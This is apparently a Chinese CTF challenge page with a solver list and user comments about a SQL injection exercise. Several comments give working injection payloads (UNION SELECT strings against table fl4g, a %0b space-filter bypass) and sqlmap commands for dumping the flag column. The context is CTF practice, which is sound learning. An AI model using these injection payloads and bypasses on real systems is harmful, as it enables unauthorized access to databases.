评分(24)
解题动态
warm007 攻破了该题 3小时前
oo123 攻破了该题 6小时前
MK 攻破了该题 10小时前
passerpty 攻破了该题 11小时前
LCUT 攻破了该题 12小时前
ROOCCO 攻破了该题 14小时前
秋天下的告白 攻破了该题 15小时前
tomcatlzy 攻破了该题 1天前
gdrhdr 攻破了该题 1天前
佳佳佳 攻破了该题 1天前
xiaoku 攻破了该题 1天前
Aimee Kirk 攻破了该题 1天前
刘译新嘿嘿 攻破了该题 1天前
yehlg 攻破了该题 1天前
1.1 攻破了该题 1天前
www.why 攻破了该题 1天前
伊克尔林 攻破了该题 1天前
qazwsxe 攻破了该题 1天前
颜沫 攻破了该题 1天前
评论
笨笨笨蛋 3年前
举报
我sqlmap进入fl4g后查看内容压根没有flag,可是手工注入又有了,这是为什么?求一个大佬解释一下
aWxvdmVjdGY 3年前
举报
fl4g 是db,然后找table,在找cloumns,最后dump
教练我要打亚索 3年前
举报
先猜一下字段,我也是没猜字段直接取数据 没取到,需要先取一下字段 然后再来取数据
笨笨笨蛋 3年前
举报
有大佬用sqlmap做的吗?我想看看sqlmap怎么做这个题目
摆烂选手 3年前
举报
@charonzzw 阿巴阿巴,摆烂选手大眼瞪小眼,咋搞啊。有没有会的,哭了
theonlypopcat 3年前
举报
sqlmap --url="http://靶场地址/index.php" --data="id=1" -D skctf -T fl4g -C skctf_flag --dump
charonzzw 3年前
举报
用burp去抓包 然后copy to flie 形成txt文件,sqlmap去运行这个包 然后依次查库 表 列就出flag了
秋刀鱼の丸 3年前
举报
1' and 1=2 union select 1,2,3,skctf_flag from fl4g#
jiangyou 3年前
举报
http://t.csdn.cn/GCIkY
Hobin 3年前
举报
一个sqlmap就能完美解决
MONSTEinCAT 3年前
举报
鸡你太美
阿厂 3年前
举报
哎呦你干嘛
肥肠粉 3年前
举报
小黑子,哥哥下的蛋你别吃
Sauexceed 3年前
举报
小黑子
yemur 3年前
举报
id=-1' union select 1,2,3,skctf_flag from fl4g#
lysandria 3年前
举报
过滤了一些东西,空格用%0b绕过。payload:id=-1' union%0bselect%0bgroup_concat(skctf_flag),2,3,4%0bfrom fl4g#
15338641414 4年前
举报
输入框的sql注入
Hey0iopklh 4年前
举报
'闭合,union注入